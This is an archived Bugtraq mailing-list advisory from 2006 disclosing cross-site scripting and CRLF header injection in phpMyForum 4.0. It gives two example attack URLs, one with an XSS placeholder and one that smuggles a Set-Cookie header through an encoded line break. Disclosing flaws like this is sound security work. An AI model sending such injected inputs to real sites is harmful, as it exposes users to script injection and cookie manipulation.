[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

phpMyForum Cross Site Scripting & CRLF injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpMyForum Cross Site Scripting & CRLF injection
From: root__@xxxxxxxxxxxxx
Date: 10 Apr 2006 09:56:09 -0000

Title : phpMyForum Cross Site Scripting & CRLF injection
Author: Mourad aka Psych0
Moroccan Security Team
Vendor: www.phpmyforum.de
Version: 4.0

Examples:

http://target/path/index.php?page=[xsscode]&type=text%2Fcss

http://target/path/index.php?template=css&type=some_url%0d%0aSet-Cookie%3Aheader

Prev by Date: Jbook Cross Site Scripting
Next by Date: PHPWebGallery Multiple Cross Site Scripting Vulnerabilities
Previous by thread: Jbook Cross Site Scripting
Next by thread: Re: phpMyForum Cross Site Scripting & CRLF injection
Index(es):
- Date
- Thread